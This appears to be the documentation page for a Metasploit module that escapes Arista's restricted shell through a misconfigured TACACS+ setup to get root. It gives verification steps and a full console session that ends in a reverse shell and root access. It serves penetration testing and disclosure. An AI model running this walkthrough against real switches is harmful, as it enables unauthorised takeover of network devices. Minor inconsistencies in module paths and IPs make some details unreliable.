4.6 KiB
4.6 KiB
Description
Implementing TACACS+ with Arista switch versions equal to or before 4.23.1F for "Read-Only" users can circumvent using the built-in roles supplied to restrict any bash commands, leading to privilege escalation. This exploit is a combination of a poorly configured TACACS+ (tac_plus) AAA server and Arista’s alternative CLI shells.
Vulnerable Application
This module has been tested successfully on:
- tac_plus Version: 202001211926/PCRE/DES
Additional Vulnerable Tested Hardware/Software Combinations:
- DCS-7280SRAM-48C6-R – 4.22.0.1F
- DCS-7050CX3-32S-R – 4.20.11M
- DCS-7050QX-32S-R – 4.20.9M
Verification Steps
- Start
msfconsole use exploit/unix/arista_tacplus_shellset PASSWORD <password>set USERNAME <username>set LHOST <lhost>set RHOST <rhost>checkrun- You should get a root session
Scenario
root@kali:~/git/metasploit-framework# ./msfconsole
.:okOOOkdc' 'cdkOOOko:.
.xOOOOOOOOOOOOc cOOOOOOOOOOOOx.
:OOOOOOOOOOOOOOOk, ,kOOOOOOOOOOOOOOO:
'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO'
oOOOOOOOO.MMMM.oOOOOoOOOOl.MMMM,OOOOOOOOo
dOOOOOOOO.MMMMMM.cOOOOOc.MMMMMM,OOOOOOOOx
lOOOOOOOO.MMMMMMMMM;d;MMMMMMMMM,OOOOOOOOl
.OOOOOOOO.MMM.;MMMMMMMMMMM;MMMM,OOOOOOOO.
cOOOOOOO.MMM.OOc.MMMMM'oOO.MMM,OOOOOOOc
oOOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOOo
lOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOl
;OOOO'MMM.OOOO.MMM:OOOO.MMM;OOOO;
.dOOo'WM.OOOOocccxOOOO.MX'xOOd.
,kOl'M.OOOOOOOOOOOOO.M'dOk,
:kk;.OOOOOOOOOOOOO.;Ok:
;kOOOOOOOOOOOOOOOk:
,xOOOOOOOOOOOx,
.lOOOOOOOl.
,dOd,
.
=[ metasploit v5.0.92-dev-5ef76ff232 ]
+ -- --=[ 2025 exploits - 1101 auxiliary - 343 post ]
+ -- --=[ 566 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]
Metasploit tip: Display the Framework log using the log command, learn more with help log
msf5 > search arista
Matching Modulesf
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/ssh/arista_tacplus_shell 2020-02-02 great Yes Arista restricted shell escape (with privesc)
msf5 > use 0
msf5 exploit(unix/ssh/arista_tacplus_shell) > show options
Module options (exploit/unix/ssh/arista_tacplus_shell):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD yes Password to login with
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 22 yes The target port
USERNAME yes Username to login with
Payload options (linux/x86/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
CMD /bin/sh yes The command string to execute
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Universal
msf5 exploit(unix/ssh/arista_tacplus_shell) > set LHOST eth0
LHOST => 10.10.10.20
msf5 exploit(unix/ssh/arista_tacplus_shell) > set RHOSTS 10.10.10.10
RHOSTS => 10.10.10.10
msf5 exploit(unix/ssh/arista_tacplus_shell) > set USERNAME admin
USERNAME => admin
msf5 exploit(unix/ssh/arista_tacplus_shell) > set PASSWORD admin
PASSWORD => admin
msf5 exploit(unix/ssh/arista_tacplus_shell) > check
[+] 10.10.10.10:22 - The target is vulnerable.
msf5 exploit(unix/ssh/arista_tacplus_shell) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.10.10.20:4444
[*] 10.10.10.10:22 - Attempt to login to the Arista's restricted shell...
msf5 exploit(unix/ssh/arista_tacplus_shell) > [+] SSH connection established.
[*] Requesting pty rbash
[+] Pty successfully obtained.
[*] Requesting a shell.
[+] Spawned into arista rbash shell.
[*] Attempting to break out of Arista rbash...
[+] Escaped from rbash!
[*] Command shell session 1 opened (10.01.10.20:4444 -> 10.10.10.10:51153) at 2020-06-09 15:39:53 -0700
msf5 exploit(unix/ssh/arista_tacplus_shell) > sessions -i 1
[*] Starting interaction with 1...
bash-4.3# whoami
whoami
root
bash-4.3# exit
exit
exit
[*] 10.10.10.10 - Command shell session 1 closed.
msf5 exploit(unix/ssh/arista_tacplus_shell) >